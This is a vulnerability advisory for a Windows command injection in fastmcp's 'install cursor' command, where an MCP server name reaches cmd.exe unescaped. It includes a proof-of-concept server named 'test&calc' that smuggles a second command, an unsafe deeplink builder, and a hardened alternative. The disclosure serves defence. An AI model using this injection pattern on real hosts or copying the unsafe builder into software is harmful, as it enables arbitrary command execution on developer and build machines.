
CVE-2025-62801

Summary

A command-injection vulnerability lets any attacker who can influence the server_name field of an MCP server execute arbitrary OS commands on Windows hosts that run fastmcp install cursor.

Details

  1. generate_cursor_deeplink(server_name, …) embeds server_name verbatim in a cursor://…?name= query string.
  2. open_deeplink() is invoked with shell=True only on Windows. That calls cmd.exe /c start <deeplink>.
  3. Any cmd metacharacter inside server_name (&, |, >, ^, …) escapes the start command and spawns an attacker-chosen process.
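The vulnerable pattern from the three steps above, side by side with a hardened variant, as an added example written for this entry (not fastmcp's own code or its actual fix; the deeplink base path, the allowlist and the helper names are assumptions):

```python
import os
import re
import sys
import webbrowser
from urllib.parse import urlencode

# Placeholder: the page only shows "cursor://...?name=", not the real path.
DEEPLINK_BASE = "cursor://example-deeplink/mcp/install"

# Constructed sample: the server name used in the advisory's PoC.
POC_NAME = "test&calc"

# Assumed allowlist: letters, digits, dot, underscore, hyphen; no cmd metacharacters.
_SAFE_NAME = re.compile(r"[A-Za-z0-9._-]{1,64}")


def is_safe_server_name(server_name: str) -> bool:
    """True only when the name contains nothing cmd.exe could interpret."""
    return _SAFE_NAME.fullmatch(server_name) is not None


def build_deeplink_unsafe(server_name: str, config: str) -> str:
    """Vulnerable pattern: server_name is concatenated verbatim, so a
    metacharacter such as '&' survives into the URL that cmd.exe later parses."""
    return f"{DEEPLINK_BASE}?name={server_name}&config={config}"


def build_deeplink_safe(server_name: str, config: str) -> str:
    """Hardened: reject names outside the allowlist, then percent-encode
    every query value instead of string-concatenating it."""
    if not is_safe_server_name(server_name):
        raise ValueError(f"unsafe MCP server name: {server_name!r}")
    return DEEPLINK_BASE + "?" + urlencode({"name": server_name, "config": config})


def open_deeplink_safe(url: str) -> None:
    """Hand the URL to the OS without routing it through cmd.exe /c start."""
    if sys.platform == "win32":
        os.startfile(url)  # ShellExecute: no shell command line is parsed
    else:
        webbrowser.open(url)
```

The allowlist is the primary control; percent-encoding and avoiding shell=True are defence in depth so that a name that slips past validation still never reaches a shell parser.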

PoC

server.py

```python
import random

from fastmcp import FastMCP

# The "&" in the server name is the PoC payload: on Windows it terminates the
# "start" command built by open_deeplink() and runs "calc" as a second command.
mcp = FastMCP(name="test&calc")


@mcp.tool
def roll_dice(n_dice: int) -> list[int]:
    """Roll `n_dice` 6-sided dice and return the results."""
    return [random.randint(1, 6) for _ in range(n_dice)]


if __name__ == "__main__":
    mcp.run()
```

Then run in the terminal: fastmcp install cursor server.py

Impact

OS Command / Shell Injection (CWE-78). Every Windows host that runs fastmcp install cursor is at risk: developers' local workstations, CI/CD agents and corporate build machines alike.
